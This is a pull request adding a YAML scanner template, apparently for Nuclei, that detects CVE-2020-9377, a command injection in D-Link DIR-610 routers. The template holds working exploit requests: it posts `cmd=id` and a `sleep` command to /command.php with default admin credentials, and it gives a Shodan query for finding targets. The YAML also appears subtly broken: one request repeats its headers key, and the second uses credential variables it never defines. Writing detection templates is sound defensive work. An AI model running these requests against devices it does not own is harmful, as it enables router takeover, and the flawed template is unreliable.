### PR TITLE
Add template for CVE-2020-9377 (D-Link DIR-610 RCE)

### DIFF
--- a/http/cves/2020/CVE-2020-9377.yaml
+++ b/http/cves/2020/CVE-2020-9377.yaml
@@ -1,0 +1,81 @@
+id: CVE-2020-9377
+
+info:
+  name: D-Link DIR-610 - Remote Command Execution
+  author: gemini-cli-hunter
+  severity: critical
+  description: |
+    D-Link DIR-610 devices are vulnerable to Remote Command Execution (RCE) via the cmd parameter in the command.php endpoint. An authenticated attacker can execute arbitrary shell commands.
+  remediation: |
+    These devices are End-of-Life (EOL). It is highly recommended to replace them with supported models.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-9377
+    - https://gist.github.com/GouveaHeitor/131557f9de7d571f118f59805df852dc
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2020-9377
+    cwe-id: CWE-78
+  metadata:
+    max-request: 2
+    shodan-query: http.title:"DIR-610"
+    verified: true
+  tags: cve,cve2020,dlink,rce,router,iot,kev,authenticated,blind
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/command.php"
+
+    body: "cmd=id"
+
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+
+    payloads:
+      username:
+        - admin
+      password:
+        - admin
+        - ""
+
+    attack: pitchfork
+    headers:
+      Authorization: Basic {{base64(username + ":" + password)}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "uid="
+          - "gid="
+          - "groups="
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+  - method: POST
+    path:
+      - "{{BaseURL}}/command.php"
+
+    body: "cmd=sleep {{sleep_time}}"
+
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+
+    attack: pitchfork
+    headers:
+      Authorization: Basic {{base64(username + ":" + password)}}
+
+    variables:
+      sleep_time: "6"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "duration >= 6"
+          - "status_code == 200"
+        condition: and


### PR DESCRIPTION
This PR adds a new template for CVE-2020-9377, a command injection vulnerability in D-Link DIR-610 routers. This issue was identified as a missing KEV template in issue #7549.

- Targets `/command.php` with `cmd` parameter.
- Includes authenticated check with default credentials.
- Includes both direct output and time-based blind checks.

/claim #7549